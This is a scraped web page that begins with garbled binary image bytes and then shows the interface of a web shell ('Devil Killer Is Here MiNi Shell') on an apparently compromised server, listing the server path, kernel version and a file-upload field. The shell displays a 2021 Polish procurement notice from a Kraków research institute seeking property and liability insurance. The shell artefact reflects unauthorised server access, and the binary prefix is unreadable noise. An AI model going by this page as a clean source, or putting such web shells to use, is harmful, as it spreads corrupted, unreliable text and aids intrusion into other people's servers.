JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211109/0026189303-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> USŁUGI UBEZPIECZENIOWE:<br/>Część 1: Ubezpieczenie mienia, sprzętu elektronicznego, <br/>mienia w transporcie oraz ubezpieczenia komunikacyjne<br/>Część 2: Ubezpieczenie od odpowiedzialności cywilnej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">SIEĆ BADAWCZA ŁUKASIEWICZ - INSTYTUT CERAMIKI I MATERIAŁÓW BUDOWLANYCH</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000056377</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Cementowa 8</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">31-983</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">12 683 79 11</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">info.krakow@lukasiewicz.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.icimb.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Prowadzenie badań naukowych i prac rozwojowych, wdrożenie wyników badań naukowych i prac rozwojowych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> USŁUGI UBEZPIECZENIOWE:<br/>Część 1: Ubezpieczenie mienia, sprzętu elektronicznego, <br/>mienia w transporcie oraz ubezpieczenia komunikacyjne<br/>Część 2: Ubezpieczenie od odpowiedzialności cywilnej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bacfdfab-4071-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00261893</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">03</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005544/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.10 Ubezpieczenie mienia, sprzętu elektronicznego, mienia w transporcie, ubezpieczenia komunikacyjne oraz OC Łukasiewicz - Instytut Ceramiki i Materiałów Budowlanych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://icimb.bip-e.pl/icm/zamowienia-publiczne/aktualne-postepowania/11,Przetargi-ponizejprogow- unijnych.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://icimb.bip-e.<br/>pl/icm/zamowienia-publiczne/aktualne-postepowania/11,Przetargiponizejprogowunijnych.<br/>html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Sposób<br/>sporządzenia dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń musi być zgody z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów<br/>z dnia 27 czerwca 2017 r. w sprawie użycia środków komunikacji elektronicznej w postępowaniu o<br/>udzielenie zamówienia publicznego oraz udostępniania<br/>i przechowywania dokumentów elektronicznych oraz rozporządzeniu Ministra Rozwoju z dnia 26 lipca<br/>2016 r. w sprawie rodzajów dokumentów, jakich<br/>może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">administratorem Pani/Pana danych osobowych jest Sieć<br/>Badawcza ŁUKASIEWICZ - Dyrektor Instytutu Ceramiki i Materiałów Budowlanych<br/>Ogłoszenie nr 2021/BZP 00121310/01 z dnia 2021-07-20<br/>2021-07-20 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w<br/>trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>z siedzibą w Krakowie, przy ul. Cementowa 8, 31-983 Kraków; Danych, kontakt pisemny za pomocą poczty tradycyjnej na adres Sieć Badawcza ŁUKASIEWICZ -<br/>Instytut Ceramiki i Materiałów Budowlanych, Oddział Szkła i Materiałów Budowlanych, ul. Cementowa<br/>8, 31-983 Kraków, pocztą elektroniczną na adres e-mail: iod@icimb.pl;<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit.c RODO w celu<br/>prowadzenia przedmiotowego postępowania o udzielenie zamówienia publicznego oraz zawarcia<br/>umowy, a podstawą prawną ich przetwarzania jest obowiązek prawny stosowania sformalizowanych<br/>procedur udzielania zamówień publicznych spoczywający na Zamawiającym;<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art.22 RODO;<br/>• Posiada Pan/Pani:− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących;− na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych<br/>osobowych, przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego<br/>ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników.− na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania<br/>w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w<br/>celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu<br/>publicznego Unii Europejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania<br/>danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia.<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; Jednocześnie<br/>Zamawiający przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14<br/>RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z<br/>prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od wykonawcy biorącego udział<br/>w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa w art. 14<br/>ust. 5 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:− w związku z art. 17 ust. 3 lit. b,<br/>d lub e RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia danych osobowych, o<br/>którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6<br/>ust.1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FL.261.35.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: UBEZPIECZENIE MIENIA, SPRZĘTU ELEKTRONICZNEGO, MIENIA W TRANSPORCIE ORAZ UBEZPIECZENIA KOMUNIKACYJNE. Ubezpieczający	SIEĆ BADAWCZA ŁUKASIEWICZ – INSTYTUT CERAMIKI I MATERIAŁÓW BUDOWLANYCH (Ł-ICIMB) <br/>31-983 Kraków, ul. Cementowa 8<br/>NIP 5250007626<br/>Regon 000056377<br/>Ubezpieczony	SIEĆ BADAWCZA ŁUKASIEWICZ – INSTYTUT CERAMIKI I MATERIAŁÓW BUDOWLANYCH (Ł-ICIMB) <br/>31-983 Kraków, ul. Cementowa 8<br/>NIP 5250007626<br/>Regon 000056377<br/>Okres trwania umowy	24 miesiące tj. od 01.01.2022 do 31.12.2023 z podziałem na dwa roczne okresy ubezpieczenia. <br/><br/>Ubezpieczyciel potwierdzi ochronę w odniesieniu do każdego z rocznych okresów ubezpieczenia odrębnym dokumentem ubezpieczenia (polisą).<br/>Okres ubezpieczenia	I okres polisowy: 01.12.2021 r. – 30.11.2022 r.<br/>II okres polisowy: 01.12.2022 r. – 30.11.2023 r.<br/>Miejsce ubezpieczenia	Teren Rzeczypospolitej Polskiej, w tym m.in. wszystkie lokalizacje, w których prowadzona jest działalność Ubezpieczającego, składowane jest mienie, prowadzone są imprezy plenerowe, ośrodki wczasowe, etc.<br/><br/>Główne lokalizacje prowadzonej działalności, to:<br/>	Warszawa, ul. Postępu 9<br/>	Warszawa, ul. Kupiecka 4<br/>	Gliwice, ul. Toszecka 99 <br/>	Opole, ul. Oświęcimska 21<br/>	Kraków, ul. Cementowa 8<br/>	Kraków, ul. Lipowa 3<br/>	Kraków, ul. Romanowicza 19a<br/>Przedmiot ubezpieczenia	a)	Budynki i budowle wraz z infrastrukturą i instalacjami technicznymi zapewniającymi możliwość użytkowania budynku i budowli zgodnie z jego przeznaczeniem, takimi jak m.in. sieci, w tym wodno-kanalizacyjne, elektryczne, energetyczne*, przyłącza*, instalacje, w tym stacje transformatorowe*, węzły cieplne*, ogrodzenia, mury, bramy, przejazdy, place, parkingi, szlabany, drogi, chodniki, oświetlenie nieruchomości, wykończenia terenu (elementy zieleni, skarpy, etc), nakłady adaptacyjne (w tym m.in. drzwi, rolety, zabezpieczenia przeciwkradzieżowe), obiekty małej architektury oraz nakłady adaptacyjne.<br/>b)	Maszyny i urządzenia**, wyposażenie, pozostałe środki trwałe, w tym sprzęt elektroniczny powyżej 10 lat od daty produkcji<br/>c)	Zbiory biblioteczne<br/>d)	Środki obrotowe<br/>e)	Mienie osób trzecich<br/>f)	Szyby i inne elementy szklane<br/>g)	Mienie pracownicze<br/>h)	Wartości pieniężne w lokalu<br/>i)	Inne wartości - platyna w lokalu, w kasie i w skarbcu<br/><br/>* Dla sieci nie obowiązuje limit odległości, pod warunkiem, że sieci te pozostają w posiadaniu Ubezpieczonego.<br/>**Maszyny stanowiące integralną część budynku, w tym m.in. windy, klimatyzatory, etc. oraz pozostałe maszyny i urządzenia.<br/>Zakres ubezpieczenia	Wszystkie ryzyka fizycznego uszkodzenia, zniszczenia lub utraty mienia na skutek nagłych, niespodziewanych i niezależnych od woli Ubezpieczającego zdarzeń losowych z włączeniem m.in. ryzyka kradzieży z włamaniem, rabunku, wandalizmu, graffiti, powodzi w tym także w odniesieniu do mienia znajdującego się na terenie, gdzie występowała powódź lub na obszarach bezpośrednio zagrożonych powodzią, dymu, sadzy, osmaleniu, eksplozji, implozji, bezpośredniego uderzenia pioruna, pośredniego działania wyładowań atmosferycznych, wysokiego i niskiego napięcie i zjawisk pochodnych, działanie wody, w tym m.in. zalania wodą z urządzeń wodno-kanalizacyjnych, burzy, sztormu, wylewu wód podziemnych i gruntowych, cofnięcie się wody, ścieków lub innych cieczy i substancji, deszczu nawalnego, zalania przez nieszczelności okienne i drzwiowe, pary wodnej i cieczy, mrozu, gradu, śniegu, samoczynne uruchomienie instalacji tryskaczowej, gaśniczej lub z innego powodu innych niż w skutek pożaru, nieumyślne pozostawienie kranów lub innych zaworów, trąby powietrzne, huragan, działanie wiatru, lawiny, osunięcie i zapadanie się ziemi, uderzenie pojazdu (wszelkiego rodzaju) niezależnie kto jest jego właścicielem w tym szkody w samym pojeździe, o ile zgłoszony jest do ubezpieczenia lub uderzenie/upadek jakiegokolwiek innego mienia/rzeczy/obiektu w ubezpieczony przedmiot, w tym upadek/uderzenie drzew, roślin, itp., szyb i innych elementów szklanych, ryzyko katastrofy budowlanej, ryzyko awarii, uszkodzeń wewnętrznych oraz niefachowej obsługi maszyn i urządzeń, błąd ludzki, wady produkcyjne i materiałowe, szkody podczas oraz w wyniku konserwacji, naprawy, remontu, instalacji, utrzymania technicznego, rozruchu próbnego, testów, montażu i demontażu.<br/><br/>Ochrona ubezpieczeniowa obejmuje również:<br/>	szkody powstałe podczas tymczasowego magazynowania oraz w czasie tymczasowego wyłączenia z użytkowania,<br/>	szkody w mieniu, które nie zostało jeszcze zainstalowane i nie został jeszcze przygotowane do eksploatacji (np. jest jeszcze zapakowane),<br/>	szkody w trakcie montażu, demontażu i rozruchu próbnego.<br/><br/>Ochroną ubezpieczeniową objęte jest mienie bez względu na jego wiek, stopień zużycia technicznego czy stopień umorzenia.<br/>System ubezpieczenia / Baza wyceny wartości<br/>	a, b) wartość księgowa brutto, nowo – odtworzeniowa, ubezpieczenie na sumy stałe, <br/>c) zgodnie z wyceną, sumy stałe<br/>d) koszt nabycia/wytworzenia, ubezpieczenia na sumy zmienne<br/>f) wartość nowo – odtworzeniowa, ubezpieczenie na pierwsze ryzyko, na jedno i wszystkie zdarzenia<br/>e, g) wartość rzeczywista, ubezpieczenie na pierwsze ryzyko, na jedno i wszystkie zdarzenia<br/>h) wartość nominalna, ubezpieczenie na pierwsze ryzyko, na jedno i wszystkie zdarzenia<br/>i) wartość nabycia, ubezpieczenie na pierwsze ryzyko, na jedno i wszystkie zdarzenia<br/>	Określenie bazy wyceny będzie następowało w toku likwidacji szkody na podstawie zgromadzonych dokumentów.<br/>	Przez odtworzenie mienia rozumie się:<br/>o	zakup nowego mienia o tych samych parametrach lub parametrach najbardziej zbliżonych;<br/>o	pobranie nowego mienia z magazynu centralnego;<br/>o	zastąpienie mienia na zasadach przesunięć magazynowych, stanów środka trwałego.<br/>Suma ubezpieczenia<br/>	Łączna suma ubezpieczenia: 161.037.999,59 PLN, w tym:<br/>a)	57.368.287,19 PLN <br/>b)	89.071.908,43 PLN<br/>c) 350.000,00 PLN<br/>d) 7.894.584,24 PLN <br/>e) 2.597.680,17 PLN <br/>f) 50.000,00 PLN<br/>g) 50.000,00 PLN<br/>h) 48.000,00 PLN<br/>i) 3.607.539,56 PLN<br/><br/>Najwyższa wartość w jednej lokalizacji: 62.949.504,87 PLN (dot. to lokalizacji w Warszawie ul. Postępu 9).<br/>Podlimit dla ryzyka kradzieży z włamaniem, rabunku i wandalizmu, w tym graffiti	2.000.000,00 PLN na jedno i wszystkie zdarzenia, z uwzględnieniem sublimitu dla ryzyka graffiti w wysokości 50 000,00 PLN na jedno i 100 000,00 PLN na wszystkie zdarzenia w rocznych okresach polisowych.<br/><br/>Podlimit dla ryzyka kradzieży zwykłej	50.000,00 PLN na jedno i wszystkie zdarzenia w rocznych okresach polisowych.<br/>Podlimit dla ryzyka awarii, uszkodzeń wewnętrznych oraz niefachowej obsługi maszyn i urządzeń	500.000,00 PLN na jedno i wszystkie zdarzenia w rocznych okresach polisowych.<br/>Podlimit dla kosztów poszukiwania źródła szkody	100.000,00 PLN na jedno i wszystkie zdarzenia w rocznych okresach polisowych.<br/>Podlimit dla ryzyka przepięcia (pośrednie uderzenie pioruna)	1.000.000,00 PLN na jedno i wszystkie zdarzenia , limit na pierwsze ryzyko.<br/>Podlimit dla katastrofy budowlanej	5.000.000,00 PLN na jedno i wszystkie zdarzenia w okresie ubezpieczenia.<br/><br/>Składka	1.	Składka za każdy okres ubezpieczenia płatna w IV równych ratach na podstawie polisy wystawionej przez Ubezpieczyciela.<br/><br/>2.	I rata składki płatna nie wcześniej niż w ciągu 30 dni od daty wystawienia polisy przez Ubezpieczyciela. <br/><br/>3.	II rata składki płatna do dnia 30.04. każdego roku w trakcie obowiązywania umowy generalnej.<br/><br/>4.	III rata składki płatna do dnia 30.07. każdego roku w trakcie obowiązywania umowy generalnej.<br/><br/>5.	IV rata składki płatna do dnia 30.10. każdego roku w trakcie obowiązywania umowy generalnej.<br/><br/>6.	Składka za środki obrotowe jest składką minimalną i depozytową w wysokości 70% przewidywanej składki rocznej.<br/><br/>7.	Datę zapłaty składki przyjmuje się, jako datę obciążenia rachunku Ł-ICIMB<br/>Franszyza integralna	Nie występuje<br/>Franszyza redukcyjna <br/>(na każde zdarzenie)		10% wartości szkody min 5 000,00 PLN dla ryzyka terroryzmu, sabotażu, zamieszek, niepokojów społecznych, rozruchów i strajków<br/>	3 000 PLN – dla ryzyka awarii maszyny<br/>	1 000 PLN – dla ryzyka katastrofy budowlanej<br/>	200,00 PLN dla szyb, <br/>	pozostałe ryzyka 500,00 PLN, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przyznanie punktów zgodnie z kryteriami oceny ofert</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zakres pokrycia ryzyk fakultatywnych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest ubezpieczenie od odpowiedzialności cywilnej Sieć Badawcza Łukasiewicz - Instytutu Ceramiki i Materiałów Budowlanych </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">66510000-8 - Usługi ubezpieczeniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne 